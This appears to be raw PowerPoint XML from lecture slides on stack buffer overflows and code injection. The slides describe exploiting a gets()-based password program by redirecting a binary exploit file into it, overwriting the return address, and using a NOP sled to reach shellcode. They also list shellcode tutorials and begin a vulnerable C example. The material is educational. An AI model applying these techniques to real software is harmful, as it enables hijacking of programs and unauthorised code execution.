            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>get password program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>can also be exploited to execute arbitrary code. This time, the program was compiled for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Red Hat Linux 9.0 using GCC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>An exploit can be injected into the program via a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>binary data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>from a file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>using redirection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> as follows:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>%” “./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>BufferOverflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> &lt; exploit.bin</a:t>
            </a:r>
          </a:p>
          <a:p>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Lexical Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The following C program fragment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>This code produces the following sequences of tokens.</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1043608" y="2276872"/>
            <a:ext cx="4344108" cy="93610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27584" y="4437112"/>
            <a:ext cx="7560840" cy="10081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(5)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>The binary data file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cannot contain any newline or null characters until the last byte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>because the exploit relies on the string function gets(). The gets() function interprets a null character as a string termination character and reads data until a newline character or EOF condition is encountered.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000"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40</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8194" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="899592" y="3717032"/>
            <a:ext cx="7117714" cy="72008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971600" y="4365104"/>
            <a:ext cx="7156585" cy="792088"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="直線接點 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1403648" y="3645024"/>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012160" y="3501008"/>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372200" y="44371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6012160" y="4941168"/>
            <a:ext cx="0" cy="360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0"/>
            <a:ext cx="3960440" cy="548680"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Code Injection (6)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="1268760"/>
            <a:ext cx="2386608" cy="4873752"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Program stack overwritten by binary exploit</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41</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9218" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2411760" y="692696"/>
            <a:ext cx="5822700" cy="594928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(7)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Reverse engineering of the code can be used to determine the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exact offset </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>from the buffer to the return address in the stack frame, which leads to the location of the injected </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>However, it is possible to soften these requirements. For example, the location of the return address can be approximated by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>repeating the return address several times in the approximate region of the return address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>. Assuming a 32-bit architecture, the return address is normally 4-byte aligned.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Even if the return address is offset, there are only 4 possibilities to test. The location of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> can also be approximated by prefacing the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>instructions. The exploit need only jump somewhere in the field of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> instructions to execute the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>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Code Injection (8)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Execution result of the code injection exploit</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43</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10242" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="899592" y="2204864"/>
            <a:ext cx="6839302" cy="331236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en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> Demo (1)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>References</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> references</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Create </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> See </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://badishi.com/basic-shellcode-example/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Buffer overflow and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> videos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>buffer overflow primer part 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.youtube.com/watch?v=RF7DF4kfs1E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>buffer overflow primer part 2  - buffer overflow primer part 9 (finding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>them in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Youtube</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> ) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="zh-TW"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(2)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The concept of attacking</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="群組 26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1043608" y="2348880"/>
            <a:ext cx="6192688" cy="3816424"/>
            <a:chOff x="1043608" y="2348880"/>
            <a:chExt cx="6192688" cy="3816424"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3131840" y="2348880"/>
              <a:ext cx="2088232"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131840" y="4581128"/>
              <a:ext cx="2088232"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Return address</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="矩形 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3131840" y="2348880"/>
              <a:ext cx="2088232" cy="1728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Password [12]</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>buffer</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="矩形 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5364088" y="2348880"/>
              <a:ext cx="1296144"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364088" y="5085184"/>
              <a:ext cx="1296144" cy="10801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2060"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Shellcode</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5364088" y="4581128"/>
              <a:ext cx="1296144" cy="5760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2060"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Pointer</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="11" name="直線接點 10"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6588224" y="4869160"/>
              <a:ext cx="648072" cy="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7236296" y="4869160"/>
              <a:ext cx="0" cy="36004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6732240" y="5229200"/>
              <a:ext cx="504056" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">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195736" y="2420888"/>
              <a:ext cx="86409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043608" y="2348880"/>
              <a:ext cx="1408527" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
                <a:t>Stack Pointer</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="矩形 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5364088" y="2348880"/>
              <a:ext cx="1296144" cy="22322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2060"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Exceeding the size of the buffer</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="投影片編號版面配置區 18"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DDF26525-081F-4A1F-B92B-C5DAB6680A3D}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>45</a:t>
            </a:fld>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04664"/>
            <a:ext cx="2818656" cy="908720"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Demo (3)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="2314600" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Example </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>bfsucc.c</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3347864" y="260648"/>
            <a:ext cx="5526360" cy="6340197"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>stdbool.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>bool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>IsPasswordValid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>(void);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t> main(void) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
